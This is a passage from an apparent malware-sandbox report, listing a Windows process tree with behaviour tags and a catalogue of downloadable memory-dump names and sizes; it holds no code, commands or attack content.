                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        PID:6784
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:4924
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        PID:5532
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5208

                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                        • memory/340-210-0x0000016A35E60000-0x0000016A35ED1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/392-319-0x0000000000400000-0x0000000002C61000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          40.4MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/392-305-0x0000000002C70000-0x0000000002D1E000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          696KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/580-322-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/580-316-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/584-406-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          340KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/740-203-0x00000196D81F0000-0x00000196D823C000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/740-204-0x00000196D82B0000-0x00000196D8321000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/912-209-0x00000188F5160000-0x00000188F51D1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1056-215-0x00000229D4670000-0x00000229D46E1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1188-229-0x000001D1D6800000-0x000001D1D6871000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1244-228-0x000001FD461D0000-0x000001FD46241000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1408-216-0x0000021311640000-0x00000213116B1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-355-0x0000000005080000-0x0000000005081000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-336-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-340-0x0000000005010000-0x0000000005011000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-337-0x0000000003920000-0x000000000395C000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-349-0x0000000005070000-0x0000000005071000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-344-0x0000000005040000-0x0000000005041000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-339-0x0000000005000000-0x0000000005001000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-348-0x0000000005060000-0x0000000005061000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-342-0x0000000005030000-0x0000000005031000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-341-0x0000000005020000-0x0000000005021000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1484-347-0x0000000005050000-0x0000000005051000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-166-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-135-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          572KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-138-0x0000000000400000-0x000000000051D000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-162-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-169-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-168-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1492-137-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1648-335-0x0000000004E80000-0x0000000004EAE000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          184KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1648-350-0x0000000000400000-0x000000000325A000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          46.4MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/1912-227-0x000001DBA8F60000-0x000001DBA8FD1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2136-332-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2180-232-0x00000000030F0000-0x0000000003105000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          84KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2180-306-0x0000000003190000-0x00000000031A6000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2180-330-0x00000000031D0000-0x00000000031E5000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          84KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2248-170-0x000000001BB20000-0x000000001BB22000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2248-165-0x0000000000E60000-0x0000000000E61000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2384-208-0x0000014800250000-0x00000148002C1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2400-301-0x0000000002C70000-0x0000000002D1E000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          696KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2400-313-0x0000000000400000-0x0000000002C61000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          40.4MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2416-184-0x00000000043BC000-0x00000000044BD000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2416-185-0x0000000004240000-0x000000000429D000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          372KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2460-214-0x000001EF8EE40000-0x000001EF8EEB1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2484-212-0x00000205B8E60000-0x00000205B8ED1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2676-230-0x000001A365B00000-0x000001A365B71000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2684-231-0x000001BF16CD0000-0x000001BF16D41000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/2892-205-0x0000012848440000-0x00000128484B1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          452KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3244-280-0x0000000000290000-0x0000000000291000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3244-286-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3244-283-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3244-284-0x0000000002570000-0x0000000002571000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3920-183-0x0000000000B70000-0x0000000000C0D000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          628KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3920-186-0x0000000000400000-0x00000000008F2000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4.9MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3952-181-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/3952-182-0x0000000000400000-0x0000000000896000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4.6MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4132-386-0x0000000000400000-0x000000000067D000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4252-293-0x0000000002C70000-0x0000000002DBA000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4400-282-0x0000000005430000-0x0000000005431000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4400-287-0x0000000005420000-0x0000000005421000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4400-297-0x0000000005850000-0x0000000005852000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4400-298-0x0000000007790000-0x0000000007791000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4400-288-0x0000000005390000-0x000000000588E000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4400-277-0x0000000005890000-0x0000000005891000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4400-273-0x0000000000B10000-0x0000000000B11000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4536-354-0x0000000004D33000-0x0000000004D34000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4536-352-0x0000000004D32000-0x0000000004D33000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4536-353-0x0000000004C40000-0x0000000004C5A000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4536-343-0x0000000000400000-0x0000000002C80000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          40.5MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4536-345-0x00000000049E0000-0x00000000049FB000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          108KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4536-338-0x0000000004780000-0x00000000047AF000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          188KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4536-346-0x0000000004D30000-0x0000000004D31000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4736-240-0x00000211D6800000-0x00000211D684E000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          312KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4736-245-0x00000211D9400000-0x00000211D9506000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4736-244-0x00000211D6A70000-0x00000211D6A8B000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          108KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4736-241-0x00000211D6990000-0x00000211D6A04000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-315-0x0000000005080000-0x0000000005081000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-317-0x00000000050E0000-0x00000000050E1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-314-0x0000000005690000-0x0000000005691000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-393-0x00000000064F0000-0x00000000064F1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-321-0x0000000005120000-0x0000000005121000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-323-0x0000000005080000-0x0000000005686000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          6.0MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-302-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-394-0x0000000006BF0000-0x0000000006BF1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4860-327-0x00000000053C0000-0x00000000053C1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4864-329-0x0000000002C80000-0x0000000002DCA000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4864-334-0x0000000000400000-0x0000000002C75000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          40.5MB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-392-0x0000000007D70000-0x0000000007D71000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-377-0x00000000074F0000-0x00000000074F1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-294-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-387-0x00000000071B0000-0x00000000071B1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-390-0x0000000007B20000-0x0000000007B21000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-388-0x0000000007270000-0x0000000007271000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-416-0x0000000009590000-0x0000000009591000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-376-0x0000000004B90000-0x0000000004B91000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-396-0x0000000007400000-0x0000000007401000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-417-0x00000000090E0000-0x00000000090E1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4956-418-0x00000000092C0000-0x00000000092C1000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4972-291-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                        • memory/4972-292-0x0000000000430000-0x000000000057A000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                          Download